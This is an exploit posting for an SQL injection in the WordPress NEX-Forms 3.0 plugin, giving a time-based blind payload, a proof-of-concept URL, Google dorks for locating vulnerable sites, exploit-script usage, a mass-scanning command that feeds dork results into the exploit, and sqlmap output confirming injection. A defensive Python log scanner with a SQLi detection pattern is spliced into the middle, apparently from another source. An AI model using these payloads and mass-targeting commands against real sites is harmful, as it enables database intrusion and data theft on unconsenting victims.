The "submit_nex_form" ajax function is affected by an SQL Injection vulnerability
[ I N U R L - B R A S I L ] - [ By GoogleINURL ]
-----------------------------------------------------------------------------
# SCRIPT AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
- Original advisory: http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani
-----------------------------------------------------------------------------
- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENDOR: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google: inurl:nex-forms-express-wp-form-builder
- Dork Google: index of nex-forms-express-wp-form-builde
- VULNERABLE GET PARAMETER: nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
-----------------------------------------------------------------------------
- DBMS: 'MySQL'
- Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
-----------------------------------------------------------------------------
Info: The "submit_nex_form" ajax function is affected by an SQL Injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
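As an added defender-side example (not part of this advisory, the exploit script, or the plugin's code), the Python below scans web-server access-log lines for requests to the submit_nex_form ajax action whose nex_forms_Id is not a plain integer, which is exactly the shape of the probing shown in the sqlmap output further down. The log lines, IPs and timestamps are constructed for the example; since access logs only carry the query string, it sees GET-based probes like the PoC above, not POST bodies.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log lines (sample data, not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2015:03:18:37 +0000] "GET /wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Apr/2015:03:18:40 +0000] "GET /wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))NdbE) HTTP/1.1" 200 512 "-" "sqlmap/1.0"
10.0.0.9 - - [21/Apr/2015:03:18:41 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method and request URI.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
)
# SQL keywords or quoting that have no business in a numeric form id.
SQLI_HINT = re.compile(r"\b(sleep|benchmark|select|union|and|or)\b|['\"()]", re.IGNORECASE)


def is_suspicious(value):
    # A legitimate form id is a plain integer (the plugin casts it with intval);
    # anything else is tampering or a client bug, and both deserve a look.
    return re.fullmatch(r"\d+", value) is None


def scan_log(text):
    """Return one record per request that hits submit_nex_form with a non-numeric id."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m.group("uri"))
        if not parsed.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parsed.query, keep_blank_values=True)  # percent-decodes values
        if qs.get("action") != ["submit_nex_form"]:
            continue
        for raw in qs.get("nex_forms_Id", []):
            if is_suspicious(raw):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "nex_forms_Id": raw,
                    "sqli_keywords": SQLI_HINT.search(raw) is not None,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Feed it real logs by replacing SAMPLE_LOG with the file contents; records with sqli_keywords set are the ones worth correlating with slow responses, since the advisory's payload is time-based.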
-----------------------------------------------------------------------------
- --help:
-t : SET TARGET.
-f : SET FILE OF TARGETS.
-p : SET PROXY.
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
-----------------------------------------------------------------------------
- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND:
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"
- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
-----------------------------------------------------------------------------
[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability
OUTPUT SQLMAP:
[03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[03:25:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: PHP 5.4.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12